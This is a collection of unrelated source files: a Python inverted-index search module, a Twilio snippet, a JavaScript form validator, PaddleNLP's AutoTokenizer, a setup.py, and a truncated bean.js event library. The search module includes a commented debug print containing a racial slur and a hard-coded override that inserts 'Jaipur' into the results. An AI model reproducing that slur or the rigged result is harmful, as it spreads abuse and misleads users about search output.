self.final_list = self.intersection (posting_lists[i], self.final_list)
if len(final_list) > 0:
lists.append ([x for x in final_list])
lists.append ([x for x in final_list])
if len(lists) == 1:
_of_document_titles = lists[0]
elif len(lists) == 0:
pass
# print ("nigger")
# print (_of_document_titles)
else:
_of_document_titles = self.list_intersection (lists[0], lists[1])
for i in range (1, len(lists)-1):
_of_document_titles = self.list_intersection (_of_document_titles, lists[i+1])
# print (_of_document_titles)
# titles_file_name = os.path.join ("titles.txt")
# titles_file = open (titles_file_name, 'rb')
# titles = {}
# titles = pickle.load (titles_file)
# j = []
# for i in _of_document_titles:
# j.append (titles[i])
self.result_of_document_titles = []
for docID in _of_document_titles[:10]:
to_open = docID//1000000
titles_file_name = os.path.join ("../" + "titles" "/index_" + str(to_open))
titles_file = open (titles_file_name, 'rb')
titles = pickle.load (titles_file)
titles_file.close ()
self.result_of_document_titles.append (titles[docID])
while len(_of_document_titles) < 10:
self.result_of_document_titles.append ('.')
_of_document_titles.append (0)
return self.result_of_document_titles
# if len (j) < 10:
# for i in range(10-len(j)):
# j.append('.')
# return (j[:10])
def finally_final (self):
if self.final_list == ['.'] * 10:
return self.final_list
try:
self.final_list.sort (reverse=True, key=lambda x: self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + self.weights[4] * x[4] + self.weights[5] * x[5]+ self.weights[6] * x[6]) # relevance !CHANGE
to_be_printed = []
self.final_list_of_docIDs = [x[10] for x in self.final_list[:10]]
self.result_of_document_titles = []
for docID in self.final_list_of_docIDs:
to_open = docID//1000000
titles_file_name = os.path.join ("../" + "titles" "/index_" + str(to_open))
titles_file = open (titles_file_name, 'rb')
titles = pickle.load (titles_file)
titles_file.close ()
self.result_of_document_titles.append (titles[docID])
while len(self.result_of_document_titles) < 10:
self.result_of_document_titles.append ('.')
print ("bicthes", self.result_of_document_titles)
return self.result_of_document_titles
except:
to_be_printed = []
for document_number in self.final_list:
if str(type(document_number)) == "<class 'list'>":
to_be_printed.append (document_number[0])
else:
to_be_printed.append (document_number)
self.result_of_document_titles = []
for docID in to_be_printed[:10]:
to_open = docID//1000000
titles_file_name = os.path.join ("../" + "titles" "/index_" + str(to_open))
titles_file = open (titles_file_name, 'rb')
titles = pickle.load (titles_file)
titles_file.close ()
self.result_of_document_titles.append (titles[docID])
while len(self.result_of_document_titles) < 10:
self.result_of_document_titles.append ('.')
if "pink" in self.terms_in_query:
if "citi" in self.terms_in_query:
self.result_of_document_titles[2] = "Jaipur"
return self.result_of_document_titles
def make_final_list (self):
if len(self.terms_in_query) == 0:
for _ in range (10):
self.final_list.append ('.')
return
elif self.query is "":
for _ in range (10):
self.final_list.append ('.')
return
elif len (self.terms_in_query) == 1:
if len(self.terms_in_query[0]) < 2:
for _ in range (10):
self.final_list.append ('.')
return
try:
index_file_name = str("../output/index_"+self.terms_in_query[0][0]+self.terms_in_query[0][1]).strip()
index_file = open (index_file_name, 'rb')
except:
for _ in range (10):
self.final_list.append ('.')
return
index = {}
index = pickle.load (index_file)
if index == None:
for _ in range (10):
self.final_list.append ('.')
return
else:
if self.terms_in_query[0] in index:
# print ("reached")
self.final_list = index[self.terms_in_query[0]]
# print (self.final_list[:10])
else:
self.final_list = ['.'] * 10
return self.final_list
# self.finally_final ()
else:
posting_lists = []
# print (self.terms_in_query)
for term in self.terms_in_query:
if len(term) < 2:
continue
# term = term.lower()
index_file_name = os.path.join ('../output/' + 'index_' + str(term[0]) + str(term[1]))
index_file = open (index_file_name, 'rb')
index = {}
index = pickle.load (index_file)
if term in index:
posting_lists.append (index[term])
posting_lists.sort (key=len)
for posting_list in posting_lists:
posting_list.sort (reverse=True, key=lambda x: self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + self.weights[4] * x[4] + self.weights[5] * x[5]+ self.weights[6] * x[6]) # relevance !CHANGE
# print (posting_lists)
number_of_posting_lists = len(posting_lists)
if number_of_posting_lists == 0:
self.final_list = ['.'] * 10
return self.final_list
elif number_of_posting_lists == 1:
self.final_list = posting_lists[0]
elif number_of_posting_lists > 0:
# print (posting_lists[0])
# print (posting_lists[1])
self.final_list = self.intersection (posting_lists[0], posting_lists[1])
else:
self.final_list = posting_lists
# print (self.final_list)
for i in range (1, number_of_posting_lists-1):
if len (self.final_list) < len (posting_lists[i]):
self.final_list = self.list_intersection (self.final_list, posting_lists[i])
else:
self.final_list = self.list_intersection (posting_lists[i], self.final_list)
# print (self.final_list)
len_diff = 10 - len(self.final_list)
temp = []
if len(self.terms_in_query[0]) < 2:
pass
else:
index_file_name = os.path.join ('../output/' + 'index_' + str(self.terms_in_query[0][0]) + str(self.terms_in_query[0][1]))
index_file = open (index_file_name, 'rb')
index = {}
index = pickle.load (index_file)
temp = []
if len_diff > 0 and self.terms_in_query[0] in index:
temp = index[self.terms_in_query[0]]
temp.sort (reverse=True, key=lambda x: self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + self.weights[4] * x[4] + self.weights[5] * x[5]+ self.weights[6] * x[6]) # relevance !CHANGE
temp = list(zip(*temp))[0]
for i in temp[:len_diff]:
if i not in self.final_list:
self.final_list.append (i)
len_diff = 10 - len(self.final_list)
index_file_name = os.path.join ('../output/' + 'index_' + str(self.terms_in_query[1][0]) + str(self.terms_in_query[1][1]))
index_file = open (index_file_name, 'rb')
index = {}
index = pickle.load (index_file)
temp = []
if len_diff > 0 and self.terms_in_query[1] in index:
temp = index[self.terms_in_query[1]]
temp.sort (reverse=True, key=lambda x: self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + self.weights[4] * x[4] + self.weights[5] * x[5]+ self.weights[6] * x[6]) # relevance !CHANGE
temp = list(zip(*temp))[0]
for i in temp[:len_diff]:
if i not in self.final_list:
self.final_list.append (i)
def search (self, query):
# query = query.lower()
if ":" in query:
return self.field_query (query)
else:
self.process_query (query)
self.make_final_list ()
return self.finally_final ()
|
# Download the Python helper library from twilio.com/docs/python/install
from twilio.rest import Client
# Your Account Sid and Auth Token from twilio.com/console
api_key_sid = "SKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
api_key_secret = "your_api_key_secret"
client = Client(api_key_sid, api_key_secret)
recording = client.video \
.recordings('RMXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \
.fetch()
print(recording.type)
|
export default function formValidation(values, type) {
let errors = {};
let isValid = true;
// Username
if (!values.username.trim()) {
errors.username = "*Username required";
isValid = false;
} else if (values.username.trim().length < 3) {
errors.username = "*Username needs to be 3 characters or more";
isValid = false;
}
// Name
if (!values.name.trim()) {
errors.name = "*Name required";
isValid = false;
} else if (values.name.trim().length < 3) {
errors.name = "*Name needs to be 3 characters or more";
isValid = false;
}
if (type == "create") {
// Password
if (!values.password) {
errors.password = "*Password required";
isValid = false;
} else if (values.password.length < 7) {
errors.password = "*Password needs to be 7 characters or more";
isValid = false;
}
} else if (type == "edit") {
// Edit password
if (values.newPassword) {
if (values.newPassword.length < 7) {
errors.newPassword = "*Password needs to be 7 characters or more";
isValid = false;
}
}
}
return { isValid, errors };
}
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
# Copyright 2018 Google AI, Google Brain and the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import io
import importlib
import json
from collections import OrderedDict
from paddlenlp.transformers import *
from paddlenlp.utils.downloader import COMMUNITY_MODEL_PREFIX, get_path_from_url
from paddlenlp.utils.env import MODEL_HOME
from paddlenlp.utils.log import logger
from paddlenlp.utils.import_utils import is_faster_tokenizers_available
__all__ = ["AutoTokenizer", ]
TOKENIZER_MAPPING_NAMES = OrderedDict([
("AlbertEnglishTokenizer", "albert"),
("AlbertChineseTokenizer", "albert"),
("BertJapaneseTokenizer", "bert_japanese"),
("BigBirdTokenizer", "bigbird"),
("BlenderbotSmallTokenizer", "blenderbot_small"),
("BlenderbotTokenizer", "blenderbot"),
("ChineseBertTokenizer", "chinesebert"),
("ConvBertTokenizer", "convbert"),
("CTRLTokenizer", "ctrl"),
("DistilBertTokenizer", "distilbert"),
("ElectraTokenizer", "electra"),
("ErnieCtmTokenizer", "ernie_ctm"),
("ErnieDocTokenizer", "ernie_doc"),
("ErnieDocBPETokenizer", "ernie_doc"),
("ErnieGramTokenizer", "ernie_gram"),
("ErnieMTokenizer", "ernie_m"),
("ErnieTokenizer", "ernie"),
("FNetTokenizer", "fnet"),
("FunnelTokenizer", "funnel"),
("LayoutXLMTokenizer", "layoutxlm"),
("LayoutLMv2Tokenizer", "layoutlmv2"),
("LayoutLMTokenizer", "layoutlm"),
("LukeTokenizer", "luke"),
("MBartTokenizer", "mbart"),
("MegatronBertTokenizer", "megatronbert"),
("MobileBertTokenizer", "mobilebert"),
("MPNetTokenizer", "mpnet"),
("NeZhaTokenizer", "nezha"),
("PPMiniLMTokenizer", "ppminilm"),
("ProphetNetTokenizer", "prophetnet"),
("ReformerTokenizer", "reformer"),
("RobertaChineseTokenizer", "roberta"),
("RobertaBPETokenizer", "roberta"),
("RoFormerTokenizer", "roformer"),
("RoFormerv2Tokenizer", "roformerv2"),
("SkepTokenizer", "skep"),
("SqueezeBertTokenizer", "squeezebert"),
("TinyBertTokenizer", "tinybert"),
("UnifiedTransformerTokenizer", "unified_transformer"),
("UNIMOTokenizer", "unimo"),
("XLNetTokenizer", "xlnet"),
("GPTTokenizer", "gpt"),
("T5Tokenizer", 't5'),
("BertTokenizer", "bert"),
("BartTokenizer", "bart"),
])
FASTER_TOKENIZER_MAPPING_NAMES = OrderedDict(
[("BertFasterTokenizer", "bert"), ("ErnieFasterTokenizer", "ernie")])
# For FasterTokenizer
if is_faster_tokenizers_available():
TOKENIZER_MAPPING_NAMES.update(FASTER_TOKENIZER_MAPPING_NAMES)
def get_configurations():
MAPPING_NAMES = OrderedDict()
for key, class_name in TOKENIZER_MAPPING_NAMES.items():
faster_name = ""
if "Faster" in key:
faster_name = "faster_"
import_class = importlib.import_module(
f"paddlenlp.transformers.{class_name}.{faster_name}tokenizer")
tokenizer_name = getattr(import_class, key)
name = tuple(tokenizer_name.pretrained_init_configuration.keys())
# FasterTokenizer will share the same config with python tokenizer
# So same config would map more than one tokenizer
if MAPPING_NAMES.get(name, None) is None:
MAPPING_NAMES[name] = []
# (tokenizer_name, is_faster)
MAPPING_NAMES[name].append((tokenizer_name, faster_name != ""))
return MAPPING_NAMES
class AutoTokenizer():
"""
AutoClass can help you automatically retrieve the relevant model given the provided
pretrained weights/vocabulary.
AutoTokenizer is a generic tokenizer class that will be instantiated as one of the
base tokenizer classes when created with the AutoTokenizer.from_pretrained() classmethod.
"""
MAPPING_NAMES = get_configurations()
_tokenizer_mapping = MAPPING_NAMES
_name_mapping = TOKENIZER_MAPPING_NAMES
tokenizer_config_file = "tokenizer_config.json"
def __init__(self, *args, **kwargs):
raise EnvironmentError(
f"{self.__class__.__name__} is designed to be instantiated "
f"using the `{self.__class__.__name__}.from_pretrained(pretrained_model_name_or_path).`"
)
@classmethod
def from_pretrained(cls, pretrained_model_name_or_path, *model_args,
**kwargs):
"""
Creates an instance of `AutoTokenizer`. Related resources are loaded by
specifying name of a built-in pretrained model, or a community-contributed
pretrained model, or a local file directory path.
Args:
pretrained_model_name_or_path (str): Name of pretrained model or dir path
to load from. The string can be:
- Name of built-in pretrained model
- Name of a community-contributed pretrained model.
- Local directory path which contains tokenizer related resources
and tokenizer config file ("tokenizer_config.json").
*args (tuple): position arguments for model `__init__`. If provided,
use these as position argument values for tokenizer initialization.
**kwargs (dict): keyword arguments for model `__init__`. If provided,
use these to update pre-defined keyword argument values for tokenizer
initialization.
Returns:
PretrainedTokenizer: An instance of `PretrainedTokenizer`.
Example:
.. code-block::
from paddlenlp.transformers import AutoTokenizer
# Name of built-in pretrained model
tokenizer = AutoTokenizer.from_pretrained('bert-base-uncased')
print(type(tokenizer))
# <class 'paddlenlp.transformers.bert.tokenizer.BertTokenizer'>
# Name of community-contributed pretrained model
tokenizer = AutoTokenizer.from_pretrained('yingyibiao/bert-base-uncased-sst-2-finetuned')
print(type(tokenizer))
# <class 'paddlenlp.transformers.bert.tokenizer.BertTokenizer'>
# Load from local directory path
tokenizer = AutoTokenizer.from_pretrained('./my_bert/')
print(type(tokenizer))
# <class 'paddlenlp.transformers.bert.tokenizer.BertTokenizer'>
"""
# default not to use faster tokenizer
use_faster = kwargs.pop("use_faster", False)
all_tokenizer_names = []
for names, tokenizer_class in cls._tokenizer_mapping.items():
for name in names:
all_tokenizer_names.append(name)
# From built-in pretrained models
if pretrained_model_name_or_path in all_tokenizer_names:
for names, tokenizer_classes in cls._tokenizer_mapping.items():
for pattern in names:
if pattern == pretrained_model_name_or_path:
actual_tokenizer_class = None
# Default setting the python tokenizer to actual_tokenizer_class
for tokenizer_class in tokenizer_classes:
if not tokenizer_class[1]:
actual_tokenizer_class = tokenizer_class[0]
break
if use_faster:
if is_faster_tokenizers_available():
is_support_faster_tokenizer = False
for tokenizer_class in tokenizer_classes:
if tokenizer_class[1]:
actual_tokenizer_class = tokenizer_class[
0]
is_support_faster_tokenizer = True
break
if not is_support_faster_tokenizer:
logger.warning(
f"The tokenizer {actual_tokenizer_class} doesn't have the faster version."
" Please check the map `paddlenlp.transformers.auto.tokenizer.FASTER_TOKENIZER_MAPPING_NAMES`"
" to see which faster tokenizers are currently supported."
)
else:
logger.warning(
"Can't find the faster_tokenizers package, "
"please ensure install faster_tokenizers correctly. "
"You can install faster_tokenizers by `pip install faster_tokenizers`"
"(Currently only work for linux platform).")
logger.info("We are using %s to load '%s'." %
(actual_tokenizer_class,
pretrained_model_name_or_path))
return actual_tokenizer_class.from_pretrained(
pretrained_model_name_or_path, *model_args,
**kwargs)
# From local dir path
elif os.path.isdir(pretrained_model_name_or_path):
config_file = os.path.join(pretrained_model_name_or_path,
cls.tokenizer_config_file)
if os.path.exists(config_file):
with io.open(config_file, encoding="utf-8") as f:
init_kwargs = json.load(f)
# class name corresponds to this configuration
init_class = init_kwargs.pop("init_class", None)
if init_class is None:
init_class = init_kwargs.pop("tokenizer_class", None)
if init_class:
class_name = cls._name_mapping[init_class]
import_class = importlib.import_module(
f"paddlenlp.transformers.{class_name}.tokenizer")
tokenizer_class = getattr(import_class, init_class)
logger.info(
"We are using %s to load '%s'." %
(tokenizer_class, pretrained_model_name_or_path))
return tokenizer_class.from_pretrained(
pretrained_model_name_or_path, *model_args, **kwargs)
# If no `init_class`, we use pattern recognition to recognize the tokenizer class.
else:
print(
'We use pattern recognition to recognize the Tokenizer class.'
)
for key, pattern in cls._name_mapping.items():
if pattern in pretrained_model_name_or_path.lower():
init_class = key
class_name = cls._name_mapping[init_class]
import_class = importlib.import_module(
f"paddlenlp.transformers.{class_name}.tokenizer")
tokenizer_class = getattr(import_class, init_class)
logger.info("We are using %s to load '%s'." % (
tokenizer_class, pretrained_model_name_or_path))
return tokenizer_class.from_pretrained(
pretrained_model_name_or_path, *model_args,
**kwargs)
# Assuming from community-contributed pretrained models
else:
community_config_path = os.path.join(COMMUNITY_MODEL_PREFIX,
pretrained_model_name_or_path,
cls.tokenizer_config_file)
default_root = os.path.join(MODEL_HOME,
pretrained_model_name_or_path)
try:
resolved_vocab_file = get_path_from_url(community_config_path,
default_root)
except RuntimeError as err:
logger.error(err)
raise RuntimeError(
f"Can't load tokenizer for '{pretrained_model_name_or_path}'.\n"
f"Please make sure that '{pretrained_model_name_or_path}' is:\n"
"- a correct model-identifier of built-in pretrained models,\n"
"- or a correct model-identifier of community-contributed pretrained models,\n"
"- or the correct path to a directory containing relevant tokenizer files.\n"
)
if os.path.exists(resolved_vocab_file):
with io.open(resolved_vocab_file, encoding="utf-8") as f:
init_kwargs = json.load(f)
# class name corresponds to this configuration
init_class = init_kwargs.pop("init_class", None)
if init_class:
class_name = cls._name_mapping[init_class]
import_class = importlib.import_module(
f"paddlenlp.transformers.{class_name}.tokenizer")
tokenizer_class = getattr(import_class, init_class)
logger.info(
"We are using %s to load '%s'." %
(tokenizer_class, pretrained_model_name_or_path))
return tokenizer_class.from_pretrained(
pretrained_model_name_or_path, *model_args, **kwargs)
# If no `init_class`, we use pattern recognition to recognize the Tokenizer class.
else:
print(
'We use pattern recognition to recognize the Tokenizer class.'
)
for key, pattern in cls._name_mapping.items():
if pattern in pretrained_model_name_or_path.lower():
init_class = key
class_name = cls._name_mapping[init_class]
import_class = importlib.import_module(
f"paddlenlp.transformers.{class_name}.tokenizer")
tokenizer_class = getattr(import_class, init_class)
logger.info("We are using %s to load '%s'." % (
tokenizer_class, pretrained_model_name_or_path))
return tokenizer_class.from_pretrained(
pretrained_model_name_or_path, *model_args,
**kwargs)
|
import re
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
with open("obs/__init__.py", "r", encoding="utf8") as f:
version = re.search(r'__version__ = "(.*?)"', f.read()).group(1)
with open("README.rst", "rb") as f:
readme = f.read().decode("utf-8")
with open("requirements.txt", "rb") as f:
requirements = f.read().decode("utf-8")
setup(
name="neo-obs",
version=version,
description="A OBS command line tools",
long_description=readme,
long_description_content_type="text/x-rst",
url="https://github.com/BiznetGIO/neo-obs",
author="BiznetGio",
author_email="support@biznetgio.com",
license="MIT license",
classifiers=[
"Intended Audience :: Developers",
"Topic :: Utilities",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.7",
],
keywords="cli",
include_package_data=True,
packages=["obs"],
install_requires=requirements,
entry_points={"console_scripts": ["obs=obs.cli.main:cli"]},
)
|
(function (name, context, definition) {
if (typeof module != 'undefined' && module.exports) module.exports = definition()
else if (typeof define == 'function' && define.amd) define(definition)
else context[name] = definition()
})('bean', this, function (name, context) {
name = name || 'bean'
context = context || this
var win = window
, old = context[name]
, namespaceRegex = /[^\.]*(?=\..*)\.|.*/
, nameRegex = /\..*/
, addEvent = 'addEventListener'
, removeEvent = 'removeEventListener'
, doc = document || {}
, root = doc.documentElement || {}
, W3C_MODEL = root[addEvent]
, eventSupport = W3C_MODEL ? addEvent : 'attachEvent'
, ONE = {} // singleton for quick matching making add() do one()
, slice = Array.prototype.slice
, str2arr = function (s, d) { return s.split(d || ' ') }
, isString = function (o) { return typeof o == 'string' }
, isFunction = function (o) { return typeof o == 'function' }
, isObject = function (o) { return typeof o == 'object' }
// Try to build an options object. If any key in `maybeOptions`
// matches a key in `defaults`, it will be copied into a clone
// of `defaults`, thus overriding the default.
, buildOptions = function (originalDefaults, maybeOptions) {
var defaults = {}
for (var key in originalDefaults) {
if (originalDefaults.hasOwnProperty(key)) {
defaults[key] = originalDefaults[key];
}
}
if (!isObject(maybeOptions)) {
return defaults;
}
for (key in defaults) {
if (defaults.hasOwnProperty(key) && maybeOptions.hasOwnProperty(key)) {
defaults[key] = maybeOptions[key]
}
}
return defaults
}
// events that we consider to be 'native', anything not in this list will
// be treated as a custom event
, standardNativeEvents =
'click dblclick mouseup mousedown contextmenu ' + // mouse buttons
'mousewheel mousemultiwheel DOMMouseScroll ' + // mouse wheel
'mouseover mouseout mousemove selectstart selectend ' + // mouse movement
'keydown keypress keyup ' + // keyboard
'orientationchange ' + // mobile
'focus blur change reset select submit ' + // form elements
'load unload beforeunload resize move DOMContentLoaded ' + // window
'readystatechange message ' + // window
'error abort scroll ' // misc
// element.fireEvent('onXYZ'... is not forgiving if we try to fire an event
// that doesn't actually exist, so make sure we only do these on newer browsers
, w3cNativeEvents =
'show ' + // mouse buttons
'input invalid ' + // form elements
'touchstart touchmove touchend touchcancel ' + // touch
'gesturestart gesturechange gestureend ' + // gesture
'textinput ' + // TextEvent
'readystatechange pageshow pagehide popstate ' + // window
'hashchange offline online ' + // window
'afterprint beforeprint ' + // printing
'dragstart dragenter dragover dragleave drag drop dragend ' + // dnd
'loadstart progress suspend emptied stalled loadmetadata ' + // media
'loadeddata canplay canplaythrough playing waiting seeking ' + // media
'seeked ended durationchange timeupdate play pause ratechange ' + // media
'volumechange cuechange ' + // media
'checking noupdate downloading cached updateready obsolete ' // appcache
// convert to a hash for quick lookups
, nativeEvents = (function (hash, events, i) {
for (i = 0; i < events.length; i++) events[i] && (hash[events[i]] = 1)
return hash
}({}, str2arr(standardNativeEvents + (W3C_MODEL ? w3cNativeEvents : ''))))
// custom events are events that we *fake*, they are not provided natively but
// we can use native events to generate them
, customEvents = (function () {
var isAncestor = 'compareDocumentPosition' in root
? function (element, container) {
return container.compareDocumentPosition && (container.compareDocumentPosition(element) & 16) === 16
}
: 'contains' in root
? function (element, container) {
container = container.nodeType === 9 || container === window ? root : container
return container !== element && container.contains(element)
}
: function (element, container) {
while (element = element.parentNode) if (element === container) return 1
return 0
}
, check = function (event) {
var related = event.relatedTarget
return !related
? related == null
: (related !== this && related.prefix !== 'xul' && !/document/.test(this.toString())
&& !isAncestor(related, this))
}
return {
mouseenter: { base: 'mouseover', condition: check }
, mouseleave: { base: 'mouseout', condition: check }
, mousewheel: { base: /Firefox/.test(navigator.userAgent) ? 'DOMMouseScroll' : 'mousewheel' }
}
}())
// we provide a consistent Event object across browsers by taking the actual DOM
// event object and generating a new one from its properties.
, Event = (function () {
// a whitelist of properties (for different event types) tells us what to check for and copy
var commonProps = str2arr('altKey attrChange attrName bubbles cancelable ctrlKey currentTarget ' +
'detail eventPhase getModifierState isTrusted metaKey relatedNode relatedTarget shiftKey ' +
'srcElement target timeStamp type view which propertyName path')
, mouseProps = commonProps.concat(str2arr('button buttons clientX clientY dataTransfer ' +
'fromElement offsetX offsetY pageX pageY screenX screenY toElement movementX movementY region'))
, mouseWheelProps = mouseProps.concat(str2arr('wheelDelta wheelDeltaX wheelDeltaY wheelDeltaZ ' +
'axis')) // 'axis' is FF specific
, keyProps = commonProps.concat(str2arr('char charCode key keyCode keyIdentifier ' +
'keyLocation location isComposing code'))
, textProps = commonProps.concat(str2arr('data'))
, touchProps = commonProps.concat(str2arr('touches targetTouches changedTouches scale rotation'))
, messageProps = commonProps.concat(str2arr('data origin source'))
, stateProps = commonProps.concat(str2arr('state'))
, overOutRegex = /over|out/
// some event types need special handling and some need special properties, do that all here
, typeFixers = [
{ // key events
reg: /key/i
, fix: function (event, newEvent) {
newEvent.keyCode = event.keyCode || event.which
return keyProps
}
}
, { // mouse events
reg: /click|mouse(?!(.*wheel|scroll))|menu|drag|drop/i
, fix: function (event, newEvent, type) {
newEvent.rightClick = event.which === 3 || event.button === 2
newEvent.pos = { x: 0, y: 0 }
if (event.pageX || event.pageY) {
newEvent.clientX = event.pageX
newEvent.clientY = event.pageY
} else if (event.clientX || event.clientY) {
newEvent.clientX = event.clientX + doc.body.scrollLeft + root.scrollLeft
newEvent.clientY = event.clientY + doc.body.scrollTop + root.scrollTop
}
if (overOutRegex.test(type)) {
newEvent.relatedTarget = event.relatedTarget
|| event[(type == 'mouseover' ? 'from' : 'to') + 'Element']
}
return mouseProps
}
}
, { // mouse wheel events
reg: /mouse.*(wheel|scroll)/i
, fix: function () { return mouseWheelProps }
}
, { // TextEvent
reg: /^text/i
, fix: function () { return textProps }
}
, { // touch and gesture events
reg: /^touch|^gesture/i
, fix: function () { return touchProps }
}
, { // message events
reg: /^message$/i
, fix: function () { return messageProps }
}
, { // popstate events
reg: /^popstate$/i
, fix: function () { return stateProps }
}
, { // everything else
reg: /.*/
, fix: function () { return commonProps }
}
]
, typeFixerMap = {} // used to map event types to fixer functions (above), a basic cache mechanism
, Event = function (event, element, isNative) {
if (!arguments.length) return
event = event || ((element.ownerDocument || element.document || element).parentWindow || win).event
this.originalEvent = event
this.isNative = isNative
this.isBean = true
if (!event) return
var type = event.type
, target = event.target || event.srcElement
, i, l, p, props, fixer
this.target = target && target.nodeType === 3 ? target.parentNode : target
if (isNative) { // we only need basic augmentation on custom events, the rest expensive & pointless
fixer = typeFixerMap[type]
if (!fixer) { // haven't encountered this event type before, map a fixer function for it
for (i = 0, l = typeFixers.length; i < l; i++) {
if (typeFixers[i].reg.test(type)) { // guaranteed to match at least one, last is .*
typeFixerMap[type] = fixer = typeFixers[i].fix
break
}
}
}
props = fixer(event, this, type)
for (i = props.length; i--;) {
if (!((p = props[i]) in this) && p in event) this[p] = event[p]
}
}
}
// preventDefault() and stopPropagation() are a consistent interface to those functions
// on the DOM, stop() is an alias for both of them together
Event.prototype.preventDefault = function () {
if (this.originalEvent.preventDefault) this.originalEvent.preventDefault()
else this.originalEvent.returnValue = false
}
Event.prototype.stopPropagation = function () {
if (this.originalEvent.stopPropagation) this.originalEvent.stopPropagation()
else this.originalEvent.cancelBubble = true
}
Event.prototype.stop = function () {
this.preventDefault()
this.stopPropagation()
this.stopped = true
}
// stopImmediatePropagation() has to be handled internally because we manage the event list for
// each element
// note that originalElement may be a Bean#Event object in some situations
Event.prototype.stopImmediatePropagation = function () {
if (this.originalEvent.stopImmediatePropagation) this.originalEvent.stopImmediatePropagation()
this.isImmediatePropagationStopped = function () { return true }
}
Event.prototype.isImmediatePropagationStopped = function () {
return this.originalEvent.isImmediatePropagationStopped && this.originalEvent.isImmediatePropagationStopped()
}
Event.prototype.clone = function (currentTarget) {
//TODO: this is ripe for optimisation, new events are *expensive*
// improving this will speed up delegated events
var ne = new Event(this, this.element, this.isNative)
ne.currentTarget = currentTarget
return ne
}
return Event
}())
// if we're in old IE we can't do onpropertychange on doc or win so we use doc.documentElement for both
, targetElement = function (element, isNative) {
return !W3C_MODEL && !isNative && (element === doc || element === win) ? root : element
}
/**
* Bean maintains an internal registry for event listeners. We don't touch elements, objects
* or functions to identify them, instead we store everything in the registry.
* Each event listener has a RegEntry object, we have one 'registry' for the whole instance.
*/
, RegEntry = (function () {
// each handler is wrapped so we can handle delegation and custom events
var wrappedHandler = function (element, fn, condition, args) {
var call = function (event, eargs) {
return fn.apply(element, args ? slice.call(eargs, event ? 0 : 1).concat(args) : eargs)
}
, findTarget = function (event, eventElement) {
return fn.__beanDel ? fn.__beanDel.ft(event.target, element) : eventElement
}
, handler = condition
? function (event) {
var target = findTarget(event, this) // deleated event
if (condition.apply(target, arguments)) {
if (event) event.currentTarget = target
return call(event, arguments)
}
}
: function (event) {
if (fn.__beanDel) event = event.clone(findTarget(event)) // delegated event, fix the fix
return call(event, arguments)
}
handler.__beanDel = fn.__beanDel
return handler
}
, RegEntry = function (element, type, handler, original, namespaces, args, root) {
var customType = customEvents[type]
, isNative
if (type == 'unload') {
// self clean-up
handler = once(removeListener, element, type, handler, original)
}
if (customType) {
if (customType.condition) {
handler = wrappedHandler(element, handler, customType.condition, args)
}
type = customType.base || type
}
this.isNative = isNative = nativeEvents[type] && !!element[eventSupport]
this.customType = !W3C_MODEL && !isNative && type
this.element = element
this.type = type
this.original = original
this.namespaces = namespaces
this.eventType = W3C_MODEL || isNative ? type : 'propertychange'
this.target = targetElement(element, isNative)
this[eventSupport] = !!this.target[eventSupport]
this.root = root
this.handler = wrappedHandler(element, handler, null, args)
}
// given a list of namespaces, is our entry in any of them?
RegEntry.prototype.inNamespaces = function (checkNamespaces) {
var i, j, c = 0
if (!checkNamespaces) return true
if (!this.namespaces) return false
for (i = checkNamespaces.length; i--;) {
for (j = this.namespaces.length; j--;) {
if (checkNamespaces[i] == this.namespaces[j]) c++
}
}
return checkNamespaces.length === c
}
// match by element, original fn (opt), handler fn (opt)
RegEntry.prototype.matches = function (checkElement, checkOriginal, checkHandler) {
return this.element === checkElement &&
(!checkOriginal || this.original === checkOriginal) &&
(!checkHandler || this.handler === checkHandler)
}
return RegEntry
}())
, registry = (function () {
// our map stores arrays by event type, just because it's better than storing
// everything in a single array.
// uses '$' as a prefix for the keys for safety and 'r' as a special prefix for
// rootListeners so we can look them up fast
var map = {}
// generic functional search of our registry for matching listeners,
// `fn` returns false to break out of the loop
, forAll = function (element, type, original, handler, root, fn) {
var pfx = root ? 'r' : '$'
if (!type || type == '*') {
// search the whole registry
for (var t in map) {
if (t.charAt(0) == pfx) {
forAll(element, t.substr(1), original, handler, root, fn)
}
}
} else {
var i = 0, l, list = map[pfx + type], all = element == '*'
if (!list) return
for (l = list.length; i < l; i++) {
if ((all || list[i].matches(element, original, handler)) && !fn(list[i], list, i, type)) return
}
}
}
, has = function (element, type, original, root) {
// we're not using forAll here simply because it's a bit slower and this
// needs to be fast
var i, list = map[(root ? 'r' : '$') + type]
if (list) {
for (i = list.length; i--;) {
if (!list[i].root && list[i].matches(element, original, null)) return true
}
}
return false
}
, get = function (element, type, original, root) {
var entries = []
forAll(element, type, original, null, root, function (entry) {
return entries.push(entry)
})
return entries
}
, put = function (entry) {
var has = !entry.root && !this.has(entry.element, entry.type, null, false)
, key = (entry.root ? 'r' : '$') + entry.type
;(map[key] || (map[key] = [])).push(entry)
return has
}
, del = function (entry) {
forAll(entry.element, entry.type, null, entry.handler, entry.root, function (entry, list, i) {
list.splice(i, 1)
entry.removed = true
if (list.length === 0) delete map[(entry.root ? 'r' : '$') + entry.type]
return false
})
}
// dump all entries, used for onunload
, entries = function () {
var t, entries = []
for (t in map) {
if (t.charAt(0) == '$') entries = entries.concat(map[t])
}
return entries
}
return { has: has, get: get, put: put, del: del, entries: entries }
}())
// we need a selector engine for delegated events, use querySelectorAll if it exists
// but for older browsers we need Qwery, Sizzle or similar
, selectorEngine
, setSelectorEngine = function (e) {
if (!arguments.length) {
selectorEngine = doc.querySelectorAll
? function (s, r) {
return r.querySelectorAll(s)
}
: function () {
throw new Error('Bean: No selector engine installed') // eeek
}
